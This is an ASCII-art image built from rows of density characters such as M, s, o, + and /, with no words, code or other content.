MMMMMMMMMMMMs .osyyyyysssssssssssssssssssssssssssssoooooooooooooooooooooosoooooooooo++++++++++++++////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::///////////////////////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooossssssssssssssssyyyyyyyyyyyyyyyyyyhhhhhhdddddmmmmmmmmmmmmmmmmmmmmmmmddddddhhdddhhhhhhhhhdddddddddhys+:. :ymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMM+-:ossyyyssssssssssssssssssssssssssssoossssoosssoooooooooooooooooooooooo++++++++++++++////////////::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++o++oooooooooooooooosssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyhhhhhddddddmmmmmmmmmmmmmmmmmmmmmdddddddddddddhhhhhhhddddddddhhyo+/: .yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMNs:oosssyssssssssssssssssssssssssssssssoosssssssooosssoooooooosoooooooooooo++++++++++++///////////////::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::////////////////////////////++++///+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooosssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhdddddmmmmmmmmmmmmmmmmmmmmmdddddddddddddddddddddddddddhyyo+/::: .hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMh.:oossysssssssssssssssssssssssssssssssssooooooooooossoooooooooooooooooooooo++++++++++++++////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://///////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooosssssssssssssssssyyyyyhhhyyyhhhhhyhhhyyyyyyyhyyhhhhhhhhhhhhddddddmmmmmmmmmmmmmNmmmmmmmmdddddddddddddddddddddddhdddhhhyso+/////:`./dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMs /ossyssssssssssssssssssssssssssssssssssooooooooosssooooooooooooooooooooooooo++ooo+++++++++//////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::///////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooooosssssssssssssssssssyyyyyyyhhhhhhhhhhhhhhhhdhhhhhhhhhhhdddddddddddddddmmmmmmNNNNNNNNNNNmmmmmmddddddddddddddddddddddddhhhddhhhhyssoooooo+/:/yhmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMm+.`ossssssssssssssssssssssssssssossooooooooooooooosossoooooooooooooooooooooooooooooooo+++++++++/////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::////////////////////////+++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooosssssssssssssssssssssyyyyyyyyyhhhhhhhhhhhhhhhdddhhhhhhhhhddddddddddddddddddmmmmmNNNNNNNNmmmmmmmmddddddddddddddddddddddhhhhhhhhhhhyyyyyyysssoo+++/-//symmNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMd` -ssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooosooooooooooooooooooo++++++++++/////////////////////:::::::::::::::::::::::::::::::::///////:::///:::::://///////////////////////++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooooooooooosssssssssssssssssssssssssyyyyyyyyyhhhhhhhhhhhhhhhhhyyyyyhhhhhhhhhhhhhhhhdddddmmmmmNNNNNNNmmmmmmmmmmmmdmmdddddddddhhhhhhhhhhhhhhhhyyyyyyyyssssssssssooooo++os+dmmmmmmmNdhydNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMmo--ossssssssssssssssssssssssssssssssssoooooooosssssoooooooooooooooooooooooooooooooooooooooo+++++++++////////////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyhhyyyyhhhhhhhhhyyyyhhhhhhhhhhhhhhhdddddmmmmmmNNNNmmmmmmmmmmmmmmmmmmdddddddhhhhhhhhhhhyyyyyyyyyyysssssssssssssssssooo+o+++//+o-/++:-://:----oMMMMMMMMMNNNNNNNNdyyymNMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMd /ssssssssssssssssssssssssssssssssssooooooooossssoooosoooooooooooooooooosoooooooooooooooooo++++++++++++//////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++oo++oooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhdddddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddhhhhhhyyyyyyyyyyyyyyyyssssssssssssssssssosooosoooooooooo+ooo++///:/+yss++h++/:-------` `-oyymNMMMMMMMMMMMMMMMMM
MMMMMMMMMd `/ssssssssssssssssssssssssssssssssssoooosssoooooooooooooooooooooooooooossooooooooooooooooooooooooo+++++++++++++++++/////////////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oo++++oooooooooooooooooooooooooooosssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyhyyhhhhhhhhhhhhhdddddddddddmmmmmmmmmmmmmmmmmmmmdddddddhhhhhhyyyyyyyyyyyyyyyyyyyyssssssssssssssssssoooooooooooooooooooooooooo+++o++++///::--:///+++//:/-/--++mMMMMNNNMMMMMMM
MMMMMMMMMm/oyssssssssssssssssssssssssssssssssssoosssooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo+++++++++++++++++/////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooo++oooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhddddddddddddmmmmmmmmmmdddddhhhhhhhyyyyyyyyyyyyyyyyyyyyyssssssssssssssssooooooooooooooooooooooooooooooo+++++++++++++++++oooooossyyhhysoydNMMo::NMMMMMM
MMMMMMMMMm/sdyyssssssssssssssssssssssssssssssssooooooooooooooooossooooooooooooooooooooooooooooooosssoooooooooooooooooooo++ooo+++++++++/////////////////////////////////////////////////+++++++++++//++++++++++++++++++++++++++++++++++++++++++++++++++++++oo++ooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhdhddddddddddddddddhhhhhhhhhyyyyyyyyyyyyyyyyyyyysssssssssssssssoooooooooooooooooooooooooooooooooo+++ooo+++++++++++ooooooooosydNMMMMMMMmd-yMMMMMM
MMMMMMMMMd /hsssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooosssoooooooooooooooooooooooooooooo+++++++//////////////////////////////////////////////++/////////////+++++++++++/+++++//+++++++++++++++++++++++++++o++++++++oooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssyyysssyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhddddddhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyssssssssssssosoooooooooooooooooooooooooooooooooooooooooooo+ooo++oooooooooossymMMMMMMmh/oMMMMMM
MMMMMMMMMd.+ysssssssssssssssssssssssssssssssssssssssssoooooooooosssssoooooooooooooooooooooooooooooosoooooooooooooooossssssssssssssssssoo++++++++///////////////////////////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++o+++oooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssysssssssssssyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyysssssssssssssssoooooooooooooooooooooooooooooooo+ooo+oo+++ooo+ooooooooooooooosssymNMMMMso+NMMMMMM
MMMMMMMMMm..yysssssssssssssssssssssssssssssssssssssssooooooooooooossoooooooooooooooooooosssoooooooooooooooooooooooooooossssssssyyyyyyyssooooo+++++++++/////////////////////////////+++++//////////////////////////////////////++++++++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooossssssooosssoossssssssssssssssssssssssssssssssssssssyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyssssssssssssssssssoooooooooooooooooooooooooooooooo+oooooooo+++ooooooooooooooosssssshNMMMMMMMMMMMMM
MMMMMMMMMMy/oyssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooo+++++ooooosssyyyyyyyssssssssssssssyyyysysssooooooo++++++++////////////////////////++++//////////////////////////////////////////////++++++++++++++++++++++++++++++++++++o++oooooooooooooooooooooooooooooooooooooooooooooosssoosooosossssssssssssssssssssssssssssssyyyyyyyhyyhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyssssssssssssoooooooooooooooo+++++++++++++oo++++oooooooooooooooooooooooooooooossssysyMMMMMMMMMMMMMMM
MMMMMMMMMMs-sdysssssssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooooo+++++ooossyyyhhdddhhhhhyyyyyyssssssssssssssoooooooooooo++++++++++////////////////////////+////////////////////////////////////////////////////////+/++++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooossoooooossssooooooossssssssssssssssyyyyyyyhhhhhyhhhhhyyyyyyyyyyyyyyyyyyyyyyyyysssssoooooooo++++++++++++++++++++++++++++++++++oooosssyyyyyysssooooooooooooosyyyhhhyNMMMMMNNmdMMMMMM
MMMMMMMMMMmsymysssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooo+++o+ooossyyyyhhhhhyyyyysysssyyyyysssssssssoosooooooooooo++ooo+++++++++//////////////////////////++////////////////////////////////////////////////////////////////+++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhyyyyysssoooo+++++++//////////////+++++++++oooooosssyyyhhhdddddhhhhyyyssoooooosssyhhhmNNmdNMMMMmd:sMMMMMM
MMMMMMMMMM/:yhyssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooosyhhhhhdhhyssoooo+++ooosssssssssssssooooooooooo++++++++ooo++++++++/////////////////++++//+///++++///////////////////////////////////////////////////////////////////++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhyysssoo++++///////////////+++++ooooossyyyhhhhhddddmmmmmmmmdddhhyysssoooossyyyyso----+ymMMMNmyomMMMMMM
MMMMMMMMMM:`:syssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooosyyhhddhyyso++++++++++ooossssssssssssooooooooo++++++++++++++++++++++/////////////////++++///////+++////////////////////////////////////////////////////////////////////////++++++++++++++++++++++++++++++++++++++o++oooooooooooooooooooooooooooooooooooooo+ooooooooooooooooooooossssssssssssssyyyyyyyyyyyyyyhhhhhhhhhdddhhhhyyyssoo++////////+++++++oooossssyyhhhhdddddmddddddddddhhyysssooo+oooosssso-`sssmNNMMMMMMMMMMMMMMMMM
MMMMMMMMMMm/:.+ysssssssssssssssssssssssssssssssssssooosssoooooooooooooooooo++oooooossyyhhhhhyso++//++++++++oooossssssssssssssssssooo+++++++++++++++++++++/////////////////++////////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++ooooooooooooooo++oooooooooooooooooooooooooooooooooooooooooooosssssssssssyyyyyyyyyyyyhhhhhhhddddddddddddhhhyyssoo+++++++oooossssssyyyyyhhhhhhhhhhhhhhhyyyyssooo++++oosssssssyoo:-sNMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMNs:`syssssssssssssssssssssssssssssssssssssssssssoooooooooooooooo+++ooooosyhhhhhhyso+++//++++++oooosssssssssssssyyyhhhhyysooo++++++++oo++++++++//////////////////++///++////+////////////////////////////////////////////////////::://///////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++o+++++++oooo+++++++o+++++++++oooooooooooooooooossssssssssssssssyyyyyyyyyhhhhhhddddddddddddddddhhhhyyyysssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssysssssyyyhhhyyysy+:/yNMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMM+:`.syssssssssssssssssssssssssssssssssssssssssssssssoooooooooooooo++ooosyhhddhyys+++++++++ooooossssssyyyyyhhhdddddddhhyso+++/+++++ooo+++++++++++//////////////+++//////////////////////////////////////////////////////////////:////::://///////////////+++++++/////////////++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++o++oooooooooooooooooooosssssssssssyyyyyyyhhhhhhhhhddddddddddddddhhhyyyyyyyyyyyyyyyyyyysssyyyyssssssssysyyyyyyhhhhhhhdhhhhyysoo/ydmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMy. .ssssssssssssssssssssssssssssssssssssssssssssssssssoooooooooo+++oosyhhddhhyso+++++++++oooossssyyyhhhhddddmmddddhyyso+///++++oossoooo+++++++++////////////////////////////////////////////////////////////////////////////////:::////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooossssssssssyyyyyyhhhhhhhhhddddddddddhhhhhyyyyssssssssssssssssssssssssssssssssyyyyhhhhhhdddddddhyss++++//dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMh` .ssssssssssssssssssssssssssssssssssssssssssssssssssssooooooo+++oosyhhhhhysso++++++++oossssyyyhhhhhddddddddddhhysoo++//+++oosyyyssoo++++++++++++////////////////////////////////////////////////////++++++++/+/////////////////////////////////////////////////////////////////////+++++++++++++++++++++++++++++++++++++++++++++++++o++++++++oooooooooooooooosssssssssyyyyyhhhhhhddhhhhddddhhhhhhyyyysssssssssssssssssssssssssssssssssyyhhhhhddddddddmdddhhyyyssso+-oNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMN+ `sssyyyyyyyssssssssssssssssssssssssssssssssssssssssssssoooo++++osyyhhhyysooo+++++++oossyyyhhhhdddddddddddhyysoo+++++++oossyyyysso+///////+++++++//////////////////////////////////////////////////++///+++++//////////////////////////////////////////////::///::///////////////////++++++++++++++++++++++++++++++++++++++++++++++oo+++++ooooooooooooooooossssssssyyyyyhhhhhhhdddhhhhhhddhhhhyyyyyssssssssssssssssssssssssssyyyyyyyyhhhddddmmmmmmmmmmmmmmmmmdddhhs://:oMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMo+syssssssssssssssssssssyysssyyyysssyssssssssssssssssssssooo++++ossyhhhyysoo+++++++oosyyyyhhhhddddddddddhhysoo++++++ooosssyyyssoo++//++///+++++++++///////////////////////////////////////++++///++++++++++++//////++/////////////////////////////:::::::::::::::://////////////////////+++++++++++++++++++++++++++++++++++++o+ooooooooooooooooooooooooooossssssssyyyyyhhhhhddddddhhhhhhhhhhhyyyyyysssssssssssssssssyyyyyyyyyyyyyhhhhhdddddmmmmmmmmmmmmmmmmmmmmmmmdddmhdMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMNsssssssssssssssssssssysssyyyysssyyyssssssssssssssssssoooo+++ooosyyyyysoo++++++++oossyyyhhhddddddddhhyyoo++////+ooosssooo++++++++oooo+++++++++++++////////////////////////////////////++++///+++++++++++++/////++///////////////////////////////:::::::::///:::////////////////////////+/++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooosssssssyyyyyhhhhddddddddhhhhhhhyyyyyyyyysssssssssssssssyyyyyyyyyyyyyhhhhhhhhhhhdddddddddddddddddddddddddddddo-hNMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMmhsssssssssssssssssssssssyyyyyyyyyyyssssssssssssssssssooooo+++ooossyssooo+++++++oosssyyhhhdddmmdddhhyyso++++++oooooo++//://///+++ooooooooo++++++++//////////////////////////////////////////////////////////////////////////////////////////////::::/::/:::::://///////////////////////////+++++++++++++++++++++++++ooooooooooooooooooooooooooooooooossssssyyyyyhhhhddddddddhhhhhhhyyyyyyssssssssssssssssyyyyyyyyyyyyyyyyyyysssssyyyyyyyhhhhhhhhhhhdddddddddddddhhyo/oMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMmssssssssssssssssssssssyyyysyyysyysssssssssssssssssssooooooo+ooosssssoooo++++oooosssyyhhhdddddddhhhyyssssssssssoo++//:////////+++ooooooooo++++++++////////////////////////////////////////////////////////////////////////////////////////////::::::::::://::////////////////////////////////+++++++++++++++++++ooooooooooooooooooooooooooooooooossssssssyyyhhhhhddddddhhhhhhyyyyyyssssssssssssssssssssssssssssssssssoosssssssssyyhhhhhhhhhdddhhddddddddddddddhhhysymMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMNo+oosssssssssssssssssyyyyyysssssssssssssssssssssssssoooooooooooooooosooooooooooooossyyyyhhhhhhhhhyyyyyyyyssssoo++////+++++oooooossssoooo++++++++++////////////////////////////////////////////////////////////////////////////////////////::::::::://:////////////////////////////////////++++++++++++++++oooooooooooooooooooooooooooooooooooooosssssssyyyyhhhhddhhhhhhhyyyyyyyyssssssssssssooooooooooooosssssssssyyyyyyyyyyyyhhhhhhhhhhhdddddddddddddddddddhhhhhhhMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMNs..+osyysssssssssssssyyyyyyssssssssssssssssssssssssssssoooooooooooossssoooooooooooosssssyyyyyyyyyyysssssoo++++/++++ooossssssssssssoooooo++++++++++/////////////////////////////////////////////////////////////////////////////////////::::::::::://////////////////////////////////++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooosssssssyyyyhhhhhhhyhhhyyyyyyyyyysssssssoooooo++ooooooosssyyyyyyyhhhhyyyyyyyyyhhhhhhhhhhhhhddhhddddddddddddddddddhmNMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMsh--+sssssssssssssysyyyyssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooosssssssoooooo+++++++////+++oooossssssssossoosoooooooo+++++////////////////////////////////////////////////////////////////////////////:////::::::::::::::////://///////////////////++++++++++++++oooooooooooooosooooooooooooo+++++++++++ooooooooooooossssssyyyyyyhhhhyyyyyyyyyyyyyyyyysooooo++++++oooooossyyyyyyyhhhhhhhhhyhhhyyyysssyyyyyyyyyyyyyyyyyhhhhddddddddddmdmNMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMNMy/`-+syyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssoooooooooooooooooooooooosooosssssssooo++++++++++++//++++++ooooooooooooooossssoooooooo+++/////////////////////////////////////////////////////////////////////:::::::://::::::::::::::::////////////////////+++++++++++++++oooooosssssssssssssssooooooooo++++++++++++++oooooooooooossssyyyhhhhhhhyyyyyyyyyhhhhyyysssooooo+oooossssyyyyyyyyyysssooooooooooooooo++/:::////////////+++ooosssyyyhhhdddhymMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy-`:osyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssoooooooooooooooooossssssssssssssssssooooooooo++++++++++++++++++++ooooooooooooooooooooo++++++/++++////////////////////////////////////::::::::::////////////::::::::::::::::::::::::::::////////////////++++++++++++++++ooooossssssyyyyyysssssssoooooo+++++++//+++++++++++ooooooosssyyyhhhhhhhyyyyhhhhdddddhhhyysssyyyyyssssssooooooooo+//:::---------:::::--........------------:://++oooossssysshNMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNs.`.+yyyyyyyyyysssssssssssssssssssssssssssssssssssssssooooooooooooooooossssssssssssssssssssssoooooo+++++++///////++++++++ooo++++++++osssssooo++++++++++//++//////////////////////////////::::::::::/:///////////::::::::::::::::::::::::::://///////////////++++++++++oooooooossssssyyyyyyyyyyyyyssssooooo++++//////////++++++oooooossssyyyhhhhhhhhhhdddmmmmmmmmddddhhhso++///:------:--:---...````````........`````````...---......--::///////++++++/++yMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNs-.++yyyyyyyyyssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooossssssssssssssoooo+++++//////////++++/////::::---::+syyyyysso++++++++++++++//////////////////////////////:::://///:::::::::::::::::::::::::::::::::::::::://///////////////+++++++++oooooooossssyyyyyyyyyyyyyyyssssoooo+++//////////////++++++ooooossssyyyhhhhhhhhddmmmmmmmmmmdddhyso+/--....`............``````````.....--..........--::::::::::////+++o+++////////:`:yMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm+:.+yyyyyyyyyssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooosssoossssssssoooo+++++////////+++++/::----.......-/+shhdhyysoo+++++++++++++/////////////////////////////::://///:://///:::::::::::::::::::::::::::::::::::///////////////++++++++++oooooooosssyyyyyyyyyyyyyyssssooo++++//////:::::////++++++++oooosssssyyyyhhhhhdddmmmmmmdddhhyyso+/:--.........---------....-------::://////::////++oossyssssssyyyyyyysoo+++///////-+mMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo`syyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssoooooooooooooooooooooo++oo+++oooooooooooooooooooo++++++++++++++++/::---.........-:+shdddhysoo++o++++++++++++++/////////////////////://:::://////////////::::::::::::::::::::::::::::::::://////////////++++++++ooooooossssssyyyyyyyyyyysssooo+++++//////:://:::://///++++++++ooooossssyyyyyhhhhddddmmdddhhyysssso++////:::://///////////////////+++++++oooo++++ooooossssssssssssssssoo+++++++++++++/`-sdMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy.:++syyyyyyyyyyyyyyyyyyyyyyyyysssssssssssssssossooooooooooooooooo++++++++++++++++++++++++ooooooooooooooooo++++//::--....---::+sdmmmmdyyso++ooooo+++++++++++//////////////////////////://///////////::::::::::::::::::::::::::::::::::://///////////++++++++ooooooosssssssyyyyyysssoooo++++++///////:::::/:::///++++++++++ooooosssssyyyyyhhhhhdddddhhhhyyssooooo+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooo+---dddMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMo++.-ymhyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssoooooooooooooooo++++++++++/////////////++++++++++ooooooooooooo+++///////+osyhddmmmdhhysoo+ooooo++++++++++++++++++//////////////////////////////:/:::::::::::::::::::::::::::::::://///////////////+++++++oooooooooossssssssssssooooo+++++++////////://////////+++++++oooooooosssssyyyyyyhhhhhhhhhhhhyyysssssooooooo+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooooosssssssssssso/+.+mMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhohMmyyyyyyyyyyyyyyyyyyyyssyyyyyyyyysssssssssssssssoooooooooooooooo+++++++////////////////////+++++++++++++o++ooooosssyyyhhhhhhhhyysooooooooo++++++++++++++++++++///////////////////////////::::::::::::/:::::::::::::::::::::://///////////////+++++++oooooooooosssssssssssssoooo++++++//////////////////++++++++oooooooossssssyyyyyyyyhhhhhhhhhhyyyssssssooooooo+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooosssssssssssyyyhs-/MMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs.+mNhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssooooossooooooooooo+++++++++/////////////////////////////////++++++oooooooosssssooooooooooooo+++oo+++++++++++++//+++////////////////////////////::::::/:::::::::::::::::::::///://///////////++++++++oooooooooossssssssssssooooo+++++++///////////////++++++++++oooooooooossssyyyyyyyyhhhhhhhhyyyyyysssssooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++oooooossssssyyyyyyyyyyyyh/:MMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN--syyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysssssyysssssssssssoooooooooo+++++++++++//////////////////////////////++++++++++++++++++ooooooooooooooo++oo+++++++++++++++++/////////////////////////////::::://:::::::::::::::::::://////////////////+++++++++oooooooooooossssssssooooo+++++//////////////++++++++++ooooooooooooossssssyyyyyyyyyyyyyyyyyyyyssssssooooooooooo++++++++oooooooo+++++++++++++++++++oooo++++++ooooooooosssssssyyyyyyyyyyyyyhyyydMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs:::-+hhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyddddddddhhhyysssoooooo+++++++++++/////////////////////////++////+++///++++++++++++++++oooooooooooooooo++++++++++++++++++////////////////////////////:::::::::::::::::::://:::://////////////////+++++++++oooooooooooooooooooooo++++++++++++/////++++++++++++ooooooooooooooosssssssyyyyyyyyyyyyyyyyssssssssssooooooooooooooosyhhdddddddddhhhhhyyyysssssssssooooooooooooosssssyyyyyyyyyyyyyyyyhhhhhhhhhhMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm:`hNdhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhddhhhdhhdddhyhhhhhysso+++++++///////////////////////////++++++///////++++++++++++++++++++oooooooooooooooo+++++++++++++++++/////////////////////////////////:::::///////////////////////////////++++++++++++++ooooooooooooooooo++++++++++++++++++++++oooooooooooooossooooossssssssssyyyyyyyyyyyyssssssssssssooooooooooosydmNNNNNNNNNmmmmmmmmmdddddddddmmmmddhhysssssssyyyyyyyyyyhhhhhhhhhhhhhhhdddddhhMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM/`:ydyyyyyyyyyyyyyyyyyyyyyyyyyhhhhdhhhhhhhhhhhhhhhhhhhhhddddddddsoooo++++++///++////////++///+++/+//+++++++++++++++++++++++++++++++ooooooooooooooooooo+++++++++++++++++//////////////////////////////////////////////////////////////////++++++++++++++++++++++++++ooooo++++++++++ooooooooooooooooooooooooooossssssssssssssssssssyyysyyyyyssssssssssssoooooooooshmNNNNNNmmmmmmddddddddddddddddddddddmmmmNNmmdhhyyyyyhhhhhhhhhhhhhddddddddddmddhmMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmh:-+syyyyyyyyyyyyyyyyyyyyhdhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhdddddhyso++++//+++//+++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooo++++++++++++++++++/////////////////////////////////////////////////////////////++++++++++++++++++++++++++oo+o+++ooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssooosssoosydmNNNNmmmmmdddddddddddddddddddddddddddddddmmmNNNNmmdhhhhhhhhdddddddddddddddmmmdhymMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN/`-yyyyyyyyyyyyyyyyyhhhhhhhhhhhddddddddddddddddddddddddddddddhdddddmhs++++/++++++++++++++++++++++++++++++++++++++++++++++++++ooooooooooosooooooooooooooooo++++++++++++++++++++++++++++///////////////////////////////////////////+++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssoooossssydmNNNmmmmdddddddddddddddddddddddddddddddddddddddmNNNNNmmddddddddddddddddddddddmdhy.sMMMMMMMMMMMMMMMMMMMM
